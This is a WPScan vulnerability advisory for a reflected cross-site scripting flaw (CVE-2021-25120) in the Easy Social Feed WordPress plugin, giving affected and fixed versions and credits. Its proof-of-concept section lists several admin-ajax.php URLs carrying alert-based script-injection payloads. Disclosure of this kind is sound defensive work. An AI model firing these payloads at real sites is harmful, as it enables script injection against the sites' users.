WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Easy Social Feed < 6.2.7 - Reflected Cross-Site Scripting

Description

The plugins do not sanitise some of their parameters used via AJAX actions before outputting them back in the response, leading to Reflected Cross-Site Scripting issues

Proof of Concept

Pro version:
https://example.com/wp-admin/admin-ajax.php?action=efbl_load_feed_popup&pid="><script>alert(2)</script> (Fixed in 6.2.5)
https://example.com/wp-admin/admin-ajax.php?action=efbl_load_feed_popup&pid="><script>alert(/XSS/)</script>&link_target="><script>alert(/XSS2/)</script> (Fixed in 6.2.5)
https://example.com/wp-admin/admin-ajax.php?action=efbl_load_feed_popup&pid=1&link_target=%22onmouseover=alert(/XSS2/)// (Fixed in 6.2.7)

Free version (< 6.2.7):
https://example.com/wp-admin/admin-ajax.php?action=efbl_generate_popup_html&rand_id=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E (fixed in 6.2.7)

Affects Plugins

easy-facebook-likebox-premium
Fixed in version 6.2.7
easy-facebook-likebox
Fixed in version 6.3.4

References

CVE
CVE-2021-25120

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Thura Moe Myint

Submitter

mgthuramoemyint

Submitter twitter
mgthuramoemyint
Verified

Yes

WPVDB ID
0ad020b5-0d16-4521-8ea7-39cd206ab9f6

Timeline

Publicly Published

2021-08-12 (about 12 months ago)

Added

2022-03-24 (about 4 months ago)

Last Updated

2022-04-11 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin